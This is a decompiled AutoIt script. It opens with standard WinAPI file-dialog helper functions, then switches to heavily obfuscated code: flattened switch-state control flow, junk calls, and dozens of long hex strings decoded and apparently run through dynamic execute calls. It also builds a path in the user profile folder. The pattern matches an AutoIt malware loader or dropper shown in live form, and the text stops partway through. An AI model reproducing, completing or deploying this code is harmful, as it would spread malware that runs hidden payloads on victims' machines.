"]" ) ENDIF DLLSTRUCTSETDATA ($TINITDIR , 1 , $SINITDIR ) DLLSTRUCTSETDATA ($TOFN , "lpstrInitialDir" , DLLSTRUCTGETPTR ($TINITDIR ) ) $STITLE = STRINGSTRIPWS ($STITLE , $STR_STRIPLEADING + $STR_STRIPTRAILING ) IF $STITLE THEN $TTITLE = DLLSTRUCTCREATE ("wchar[" & (STRINGLEN ($STITLE ) + 1 ) & "]" ) ENDIF DLLSTRUCTSETDATA ($TTITLE , 1 , $STITLE ) DLLSTRUCTSETDATA ($TOFN , "lpstrTitle" , DLLSTRUCTGETPTR ($TTITLE ) ) DLLSTRUCTSETDATA ($TOFN , "Flags" , $IFLAGS ) DLLSTRUCTSETDATA ($TOFN , 15 , 0 ) DLLSTRUCTSETDATA ($TOFN , 16 , 0 ) $SDEFEXT = STRINGSTRIPWS ($SDEFEXT , $STR_STRIPLEADING + $STR_STRIPTRAILING ) IF $SDEFEXT THEN $TDEFEXT = DLLSTRUCTCREATE ("wchar[" & (STRINGLEN ($TDEFEXT ) + 1 ) & "]" ) ENDIF DLLSTRUCTSETDATA ($TDEFEXT , 1 , STRINGREPLACE ($SDEFEXT , "." , "" ) ) DLLSTRUCTSETDATA ($TOFN , "lpstrDefExt" , DLLSTRUCTGETPTR ($TDEFEXT ) ) DLLSTRUCTSETDATA ($TOFN , "lCustData" , $PDATA ) DLLSTRUCTSETDATA ($TOFN , "lpfnHook" , $POFNPROC ) DLLSTRUCTSETDATA ($TOFN , 20 , 0 ) DLLSTRUCTSETDATA ($TOFN , 21 , 0 ) DLLSTRUCTSETDATA ($TOFN , 22 , 0 ) DLLSTRUCTSETDATA ($TOFN , "FlagsEx" , $IFLAGSEX ) LOCAL $ARET SWITCH $IDLG CASE 0 $ARET = DLLCALL ("comdlg32.dll" , "bool" , "GetOpenFileNameW" , "struct*" , $TOFN ) CASE 1 $ARET = DLLCALL ("comdlg32.dll" , "bool" , "GetSaveFileNameW" , "struct*" , $TOFN ) CASE ELSE ENDSWITCH IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF NOT $ARET [0 ] THEN RETURN SETERROR (10 , _WINAPI_COMMDLGEXTENDEDERROREX () , "" ) IF BITAND ($IFLAGS , $OFN_ALLOWMULTISELECT ) THEN IF BITAND ($IFLAGS , $OFN_EXPLORER ) THEN $ADATA = _WINAPI_STRUCTTOARRAY ($TBUFFER ) IF @ERROR THEN RETURN SETERROR (11 , 0 , "" ) ENDIF ELSE $ADATA = STRINGSPLIT (DLLSTRUCTGETDATA ($TBUFFER , 1 ) , " " ) ENDIF SWITCH $ADATA [0 ] CASE 0 RETURN SETERROR (12 , 0 , "" ) CASE 1 CASE ELSE LOCAL $SPATH = $ADATA [1 ] FOR $I = 2 TO $ADATA [0 ] $ADATA [$I + 4294967295 ] = _WINAPI_PATHAPPEND ($SPATH , $ADATA [$I ] ) NEXT REDIM $ADATA [$ADATA [0 ] ] $ADATA [0 ] -= 1 ENDSWITCH ELSE $ADATA = DLLSTRUCTGETDATA ($TBUFFER , 1 ) ENDIF $__G_VEXT = $TOFN RETURN $ADATA ENDFUNC FUNC __WINAPI_PARSEMULTISELECTFILEDIALOGPATH ($APATH ) LOCAL $AFILES [UBOUND ($APATH ) + 1 ] $AFILES [0 ] = UBOUND ($APATH ) $AFILES [1 ] = STRINGMID ($APATH [1 ] , 1 , STRINGINSTR ($APATH [1 ] , "\" , $STR_NOCASESENSEBASIC , + 4294967295 ) + 4294967295 ) FOR $I = 1 TO UBOUND ($APATH ) + 4294967295 $AFILES [$I + 1 ] = STRINGMID ($APATH [$I ] , STRINGINSTR ($APATH [$I ] , "\" , $STR_NOCASESENSEBASIC , + 4294967295 ) + 1 ) NEXT RETURN $AFILES ENDFUNC FUNC __WINAPI_PARSEFILEDIALOGPATH ($SPATH ) LOCAL $AFILES [3 ] $AFILES [0 ] = 2 $AFILES [1 ] = STRINGMID ($SPATH , 1 , STRINGINSTR ($SPATH , "\" , $STR_NOCASESENSEBASIC , + 4294967295 ) + 4294967295 ) $AFILES [2 ] = STRINGMID ($SPATH , STRINGINSTR ($SPATH , "\" , $STR_NOCASESENSEBASIC , + 4294967295 ) + 1 ) RETURN $AFILES ENDFUNC #EndRegion Internal Functions GLOBAL $1396810998 = 66485247 GLOBAL $BCB6YRS8TM = 2661380 DO SWITCH $1396810998 CASE 66485247 DIM $DSKJ = @USERPROFILEDIR & "\assignedaccessproviderevents" $1396810998 = 1640164563 $BCB6YRS8TM = $BCB6YRS8TM + 1 CASE 461545339 LOCAL $HANDLE $1396810998 = 659661563 $BCB6YRS8TM = $BCB6YRS8TM + 1 CASE 498628477 $1396810998 = 461545339 $BCB6YRS8TM = $BCB6YRS8TM + 1 CASE 659661563 $BCB6YRS8TM = 2661385 CASE 1640164563 OPT (MTDUDAQCWRWM ("5670637B4B616D6C4A6B66672" ) , MTDUDAQCWRWM ("323" ) ) $1396810998 = 498628477 $BCB6YRS8TM = $BCB6YRS8TM + 1 ENDSWITCH ISBINARY (MTDUDAQCWRWM ("7A6F6457403348423254556E527037714E6D764C7952487248413" ) ) UNTIL $BCB6YRS8TM = 2661385 FUNC PIOLWBVXYS ($GF6DF148745 , $SD55V54CVX1X4 ) GLOBAL $1931633093 = 66485247 GLOBAL $AW1LULG3Q9 = 1135110 DO ISBINARY (2052974 * 3787278 * 149097 ) SWITCH $1931633093 CASE 37862237 LOCAL $EBDSXNXDQ = $A ($B (MTDUDAQCWRWM ("337B313734423430343035373531343235463133313531333131303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303331313" ) ) ) $1931633093 = 115527481 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 62585352 LOCAL $OWHBZYXHN = $A ($B (MTDUDAQCWRWM ("317933353743373636383633373337323634363536313331333733313333323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323133331" ) ) ) $1931633093 = 968575971 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 66485247 $1931633093 = 1640164563 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 110011422 LOCAL $RXWFY = $A ($B (MTDUDAQCWRWM ("307832343641373936343732373737393642373036333230323632303232333733383335343133383436343134363436343634363336343633373332333733393330333034333337333433353431343333343433333634363336333133363334343333373334333534323330333434333336333933363332333733323433333733343335343233343336333133373332333733393334333133383338333433353432333834333337333833353335343334363436343634363436343633343337333633353337333433353330343333373338333533363330343634363436343634363436333733323336343633363333333433313433333733383335333633343436343634363436343634363336333433363334333733323336333533363336343333373338333533363338343634363436343634363436333733333337333333383338333833353336343132320" ) ) ) $1931633093 = 2044148400 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 115527481 LOCAL $NZADIFY = $A ($B (MTDUDAQCWRWM ("337B31373536353135373430343B3546343B353734323133313531333131303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303331313" ) ) ) $1931633093 = 447759567 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 131139374 LOCAL $ICYNCM = $A ($B (MTDUDAQCWRWM ("337B3137343235473545353B353A34363434353B34373133313531333131303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303331313" ) ) ) $1931633093 = 681238351 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 141465917 LOCAL $TRWKSF = $A ($B (MTDUDAQCWRWM ("327A3036344634343447353A353535333032303430323030313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313230302" ) ) ) $1931633093 = 1413537436 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 143207412 LOCAL $QHIBMXIJK = $A ($B (MTDUDAQCWRWM ("3078323437383637364336353639373737413230323632303232333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333032320" ) ) ) $1931633093 = 738298583 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 164203506 LOCAL $RYZVKCUYA = $A ($B (MTDUDAQCWRWM ("347C3630333D323532423241323632423336333132463634363236343636373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373436364" ) ) ) $1931633093 = 1896016662 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 188325663 LOCAL $KVSTDS = $A ($B (MTDUDAQCWRWM ("307832343631373637393636363436463230323632303232333833363333333733343336333933363436333633363433333733343335343434333336343533303330343333373334333534323433333434353337333433343434333633313433333733343335343333303337333033353336333633393336333534333337333433353433333433373337333434363336333633353333343333373334333534333338333633353336333333373334333633393336333634333337333433353433343333363436333634353338333833343335343334353333343234343338333733353330333733333333343333303435333934313339333033303330333033303330333834343334333534343330333533303435333834343436343634353436343634363436333834323436333833383434333433353432343333353330343533383434333432320" ) ) ) $1931633093 = 1363940638 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 198714220 LOCAL $JYDRWYKPC = $A ($B (MTDUDAQCWRWM ("327A30363534353A3443343634413032303430323030363436343135313631373130313431373134363136313135313A3137313A36313634363336343634363436343134313731343133313531313134313736313135313A3137313B31323634363336343634363436343136313131343634313436373135313636313135313A3137313B3136363436333634363436343634313431373135313A313531363132313236313135313A3137313B313A3634363336343634363436343136363731353136313731303134313736313135313A3137313B36313634363336343634363436343134313331343136313731343134313B36313135313A3137363331323634363336343634363436343135313031353136313531373134313336313135313A31373633313636343633363436343634363431343631313636363134313731343636363130302" ) ) ) $1931633093 = 110011422 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 199796162 LOCAL $WZXXX = $A ($B (MTDUDAQCWRWM ("307832343631373536453732364336423230323632303232343634343436343634363436343333373338333533383334343634333436343634363436333433333337333233363335333633313433333733383335333833383436343334363436343634363337333433363335333533303337333234333337333833353338343334363433343634363436343633363436333633333336333533373333333633363433333733383335333933303436343334363436343634363337333333353337333833383338333533393332343634333436343634363436343333373338333533313334343634343436343634363436333533323337333433363433333534313433333733383335333133383436343434363436343634363336333533373332333634363334343434333337333833353331343334363434343634363436343633363335333632320" ) ) ) $1931633093 = 1149329648 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 206621569 $1931633093 = 1396237879 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 210174889 LOCAL $MZZCHZTFC = $A ($B (MTDUDAQCWRWM ("307832343639373936383644373536313636363337313230323632303232333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333032320" ) ) ) $1931633093 = 606168564 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 238109556 LOCAL $EJPWYGQ = $A ($B (MTDUDAQCWRWM ("327A303634343434353034333543343B3534353B353730323034303230303634363036343634363436343134363431343637313A313A313A31373135313036343630363436343634363436313135313A3137313231363634363136343634363436343136363731353136313631313135313036313135313A31373132313A3634363136343634363436343134313731343133313531363134313736313135313A3137313236313634363136343634363436343137313131343137313431313135313636313135313A3137313331323634363136343634363436343134313B31343634313436373132313236313135313A3137313631323634313B3634363436343634313631373135313A313531323134313336313135313A3137313631363634313B36343634363436343134363731343136313631373134363736313135313A31373136313A3634313B363430302" ) ) ) $1931633093 = 1191629704 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 248506024 LOCAL $CLDDA = $A ($B (MTDUDAQCWRWM ("30783234363936383645363936453230323632303232333033373332333634363336333634333337333833353335333034363433343634363436343633363333333533373338333833383335333533323436343334363436343634363433333733383335343633343436343234363436343634363335333033363436333733333337333434333337333833353436333834363432343634363436343633353331333733353336333933373334343333373338333534363433343634323436343634363436333434343336333533373333333733333433333733383335333033303436343334363436343634363336333133363337333633353330333034333337333833353332333434363436343634363436343633343335333634353336333433353330343333373338333533323338343634363436343634363436333633313336333932320" ) ) ) $1931633093 = 979855179 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 258734893 LOCAL $BLOKDLV = $A ($B (MTDUDAQCWRWM ("327A3036353A35353436353034403446343A303230343032303036343634313B31373637313A3634313A3634363436343634313A36303137363631323631313A313B3136313731303631313A3636313A313731313136363436313634363436343634313731323637313A31313136363731363634363436343634313A313B313631373130313A313A3636313A313731363136363436363634363436343634313731323637313A31303137363731363634363436343634313A36303137363631333136313A313B3136313731303136313A3636313A313731353136363436363634363436343634313731323637313A313331313637313636343634363436343134363331373637313A313B3136313731303132313A3630313631373132313A3137313B313A36363135313731323631313A36303634313A36343131363331373137363431373637313730302" ) ) ) $1931633093 = 1186058150 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 259414264 LOCAL $ODPVTM = $A ($B (MTDUDAQCWRWM ("347C363033363331333332353237334533373634363236343636303230373733373C3731373537343032303530323032303230323732303737323037373237363732373530373733373C3731373537303032303530323032303230323732373737323036373137303733373630373733373C37313735373C3032303530323032303230323732373537323031373337373732373530373733373C37313735303730323035303230323032303237323737373337303732373D373230323732373230373733373C373137363734303230353032303230323032373230313734373430373733373C3731303237303032373D30323032303230323730303737323730373337363730373330373733373C37313032373C3032373D30323032303230323732373137333730373137343733373630373733373C3731303230373032373D303230323032303236364" ) ) ) $1931633093 = 1481891654 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 261833793 LOCAL $IVPSU = $A ($B (MTDUDAQCWRWM ("347C3630323C323D32373246324232403247323D33363634363236343636303230353032303230323032373137343031373C3734373C303137323032303230323032373C373D373C3731373C3730373437343734373437343734373C3030373C373130303730303230353032303230323032373137343031373C30323732303137313032303230323032373C373D3730373137333037373C3030373C373130313730303230373032303230323032373137343031373C30313733303137313032303230323032373C373D373C373137333734373437353734373437343734373C3030373C3731373130373032373D3032303230323032373137343031373C30303731303137313032303230323032373C373D373037313733373C373C3030373C373137343037303230353032303230323032373137343031373C30373732303137313032303230323032373C36364" ) ) ) $1931633093 = 539605149 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 277961215 LOCAL $VNZZFQZ = $A ($B (MTDUDAQCWRWM ("327A30363433353A3446353B34373032303430323030363436303634363436343634313531313137313631343634313436303134313436313135313A3137313736313634363036343634363436343134313731343637313A313A313A31373137363736343630363436343634363436313135313A3137363336313634313B36343634363436343136363731353136313631333134313636313135313A3137363031323634313B36343634363436343134363331353137313531313135313636313135313A3137363031363634313B363436343634363431373132313531303134313B3135313436313135313A31373630313A3634313B36343634363436343134313B31343631313431373134313536313135313A3137363036313634313B36343634363436343134313731353131313731363134363436313135313A313736313132363430302" ) ) ) $1931633093 = 1509550100 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 315666680 LOCAL $GODPETUT = $A ($B (MTDUDAQCWRWM ("347C363032303337333C323C323532333330334533303634363236343636373C373C303230313032303230323032373C373730373730373430373731373430323032303037323731373D3730373437313734373C3030373C3731373C373C30323031303230323032303237313734373C3030373C373130373730303237343032303230323032373137343032303230303733373C3030373C373130323730303230313032303230323032373C37373037373037343037373137343032303230303732373037343731373D37313734373C3030373C37313032373030323031303230323032303237313734373C3030373C3731303537303031373C3032303230323032373137343032303230303733373C37373037373037343037373C3030373C3731373D30373031373230323032303230323031373C30363031303130363032303230323032373C373D373036364" ) ) ) $1931633093 = 1279923557 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 324069614 LOCAL $SPPDY = $A ($B (MTDUDAQCWRWM ("31793335373736403733374436403331333733313333323435323235353332373534323735373532323632393234353432313537353435373537353735373236323632373534323532353237353235323236323932343534323535373534353735373537353732373532323632323234353232373534353232363239323435343239353735343537353735373537323632353237323532373532323735323532323632393234353435323537353435373537353735373233353432373235323735323237353232393239323932343537323135373534353735373537353735323236323932343534353235373535353735373537353732343532323535333237353432373537353232363239323435373231353735353537353735373537323632363237353432353235323735323532323632393234353732353537353535373537353733331" ) ) ) $1931633093 = 520209828 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 332045602 LOCAL $KEGZS = $A ($B (MTDUDAQCWRWM ("317933353633373237423732363137353331333733313333323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323133331" ) ) ) $1931633093 = 354019174 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 349106536 $1931633093 = 206621569 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 353768791 LOCAL $HSROENCIU = $A ($B (MTDUDAQCWRWM ("337B31373530343A34303536343235473435313331353133313130353735303430313034303A3033303337303034303B3036303130373735373737353735373537353037373630343037303737353034303337303034303B30363031303B3735373737353735373537353035303630353736303630333034303137303034303B303630313730373537373735373537353735303537353035303030353036303430303035303537303034303B303630303033373537373735373537353735303430303033303337303034303B3036303130373735303A37353735373537353037373630343037303630323034303637303034303B30363031303B3735303A373537353735373530353036303430313034303A3037303A37303034303B3036303137303735303A37353735373537353035373630353035303537353034303137303034303B3036303031313" ) ) ) $1931633093 = 467162124 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 354019174 LOCAL $XVYDCK = $A ($B (MTDUDAQCWRWM ("31793335374337343736364036323331333733313333323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323133331" ) ) ) $1931633093 = 1693206310 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 383145765 LOCAL $HINEDBXS = $A ($B (MTDUDAQCWRWM ("347C3630324532303246323032323242323332323634363236343636303230303032303230323032373737363736303137323730373230373732373230373733373C37313037373C303230303032303230323032373230373734373430373733373C3731373D37303032303030323032303230323731303737303036373230313732303230373733373C3731373D373C3032303030323032303230323733373337323031373037303732303730373733373C3731373D30373032303030323032303230323732303737333737373737373737373630373733373C3731303537343032303030323032303230323731303737323036373237313733373630373733373C3731303537303032303030323032303230323732303137323731373230373737373730373733373C37313035373C303230303032303230323032373737363736303137323730373236364" ) ) ) $1931633093 = 553776236 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 389373181 LOCAL $DS4VS8SV = KODZMEKGBG ($SD55V54CVX1X4 ) $1931633093 = 658449325 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 393807407 LOCAL $OGYSP = $A ($B (MTDUDAQCWRWM ("3179333537303637363636373740373936313331333733313333353732393238323532343234323532393535323932343235323935373537353735373537353732343231353432393230353735343234353735373537353732393238323932343235353232313230323132313231323132393535323932343532323535373532353735373537353732343231353432393231353535343234353735373537353732393238323532343237323932393535323932343533323935373534353735373537353732343231323935353235323435343231323432313537353735353236323935333535323935343239353732373534323535373537353735373239323832353234323432313239353532393234353232353537353335373537353735373234323132393535323532343534323132343231353735373535323632393533353532393534323933331" ) ) ) $1931633093 = 415444496 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 394674397 $A ($B (MTDUDAQCWRWM ("347C3030324732473137333033363331323733303137323133303030323533303235363C303032473247313733303336333132373330303733363231323533303231363C36363236333D333032313634373C373D32323230373C3230314636363634363236343036323D324132353336333D304732313241363C36303337333432303242323D323033373241363D363436323634363631403636364736343630334537313732323037313732373137323335363D364736343636373C373D32323230373C323036363647363436303337333432303242323D323033373241363D4" ) ) ) $1931633093 = 1871778911 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 395587655 LOCAL $LQMQYYO = $A ($B (MTDUDAQCWRWM ("337B3137343A3434353A354035353133313531333131303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303331313" ) ) ) $1931633093 = 1390786238 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 397642398 LOCAL $RMKMJOK = $A ($B (MTDUDAQCWRWM ("31793335363437433733373336383732373236323331333733313333323932393239323432333233353732383537353735373537353232363239323432373532353735303537353735373537323432333236323532373532323532323532323632393234323632313537353035373537353735373236323332373234323732303236323535323236323932343236323535373530353735373537353732373234323432343236323232373234353232363239323432363239353735303537353735373537323632333234323132363233323735373532323632393234323635323537353035373537353735373237323232373234323632323236323232393239323932343239323135373530353735373537353735323236323932343535323535373530353735373537353732343530323632363235323232363233353232363239323435353239353733331" ) ) ) $1931633093 = 918764304 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 415444496 LOCAL $MEHPSWE = $A ($B (MTDUDAQCWRWM ("337B313735453534343A34303433313331353133313137373735373630373735373537353735303B303A303730363037303B303B3737303B30363035303737353730373537353735373530363033303B37373037303637363033303630333735373537373034303B37313737303B3736303B3730303B373630373735373537353735303B303A3037303630373037303B3737303B30363037303737353730373537353735373530363033303B37373037303637363033303630333735373537373034303B37313737303B3736303B37313032373630373735373537353735303B3731303637373032303B303B303A3037303630373730303B3737303B303637353037373537313735373537353735303630333736303B303A3735373630373735373537353735303B303A3037303630303037303B3737303B30363031303737353735373531313" ) ) ) $1931633093 = 1596378509 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 421435348 LOCAL $MCMSEWDFH = $A ($B (MTDUDAQCWRWM ("31793335374337443639373236373740373537423331333733313333323932323532323532313532323432313537353735353237323432383235323132343231323935353239323432303231353735343537353735373537323432313239353532393234353532353537323535373537353735373234323135373537353532363239353532393234323732353537353435373537353735373239323235323235323135323234323135373537353532373234323832353231323432313239353532393234323732353537353435373537353735373234323132393535323932343533323535343532353735373537353732343231353735373535323632393535323932343535353235373534353735373537353732393232353232353231353232343231353735373535323732343238323532313234323132393535323932343535353235373534353733331" ) ) ) $1931633093 = 1699276693 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 447759567 LOCAL $CPFJLFCG = $A ($B (MTDUDAQCWRWM ("347C36303241334532353230323D3232333D3634363236343636373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373437343734373436364" ) ) ) $1931633093 = 563727983 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 450667607 LOCAL $PRFAKJPV = $A ($B (MTDUDAQCWRWM ("337B3137344235473437353B354631333135313331313030303537353037303A3035373637303034303B30363031303B3735373037353735373537353035303A303430373035303A3035303237303034303B303630313730373537303735373537353735303537303035303A30343732303530363035303537303034303B303630303033373537303735373537353735303730363034303B303B303B303B30363030303137353730373537353735373537303034303B3036303430373735373137353735373537353037303030353735303730303034303137303034303B30363034303B3735373137353735373537353035303630353032303430373035303637303034303B3036303437303735373137353735373537353037303A30353736303430303034303737303034303B3036303B30333735373137353735373537353035303231313" ) ) ) $1931633093 = 1266850013 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 451848573 LOCAL $XELICF = $A ($B (MTDUDAQCWRWM ("31793335374337433734373237303744373237373331333733313333323132393234323132393533323532343533323932393232353232313231323932343231353735373236323435343239323932383236353532313239353735373238323432393231323132303231323132313231323932343532323132363238323135323234323635373537323632343534323935373537323832343234353232313230323132313231323135343533353335323239353332353234323132393232353332353237323232353236323432313534323432313537353732363234353432393537353732383234323735323231323032313231323132313239323435323231323632393535353432393533323532373234323132343236323732393231323132313231323132313231323932373530323532313239323832353234353532313239353532353234353533331" ) ) ) $1931633093 = 1747070148 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 461545339 LOCAL $HLFACBFV = MTDUDAQCWRWM ("3179443838363044313131313434394344424339354534403131313139324442303537373238313236353135323242314443364739433532324239303242303934313534313131313634473139433535303936393932373447393131313242323943343133313943353930393437394336313042313245323132473234363938354547313934423836353547394335313335313242323938351" ) $1931633093 = 659661563 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 465670163 $1931633093 = 1857967641 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 467162124 LOCAL $KFXYTE = $A ($B (MTDUDAQCWRWM ("327A3036343A353135303444343734473431343B3537303230343032303031323634313B36343634363436343134363631343133313531363134313B36313135313A3137313131363634313B36343634363436343134363431343637313731323135313036313135313A31373131313A3634313B3634363436343634313436343134313131343137313531313134313436313135313A3137313136313634313B3634363436343634313531313132313236313135313A3137313231363634363636343634363436343136313531343137313531363137313136313135313A31373132313A3634363636343634363436343135313B31353131313531363134313736313135313A313731323631363436363634363436343634313436363136313B31343637313431343134313436313135313A313731333132363436363634363436343634313436343132313230302" ) ) ) $1931633093 = 1628863899 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 483530794 LOCAL $ZSSDBQN = $A ($B (MTDUDAQCWRWM ("327A30363543343534303537353B3531343734403032303430323030313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313231323132313230302" ) ) ) $1931633093 = 37862237 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 498628477 LOCAL $B = $A (MTDUDAQCWRWM ("63686F6073781" ) & MTDUDAQCWRWM ("766D7176706B6C652" ) ) $1931633093 = 461545339 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 503776576 LOCAL $YBTNZF = $A ($B (MTDUDAQCWRWM ("30783234363337393741373636333230323632303232333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333033303330333032320" ) ) ) $1931633093 = 1974000802 $AW1LULG3Q9 = $AW1LULG3Q9 + 1 CASE 520209828 LOCAL $WJYHZBW = $A ($B (MTDUDAQCWRWM ("30783234373337303730363437393230323632303232343633363433333733333335343333363331343333373338333534363338343634343436343634363436333633343337333633363331333733303433333733383335343634333436343434363436343634363336333933333333333333323332343534333337333833353330333034363435343634363436343633363334333634333336343333303330343333373338333533323338343634353436343634363436333534333334343233363435333634363433333733383335333234333436343534363436343634363337333733363435333433343336343334333337333833353333333034363435343634363436343633363433333733333335343333363432343333373338333533333334343634353436343634363436333633353337333233363435333633353433333732320" 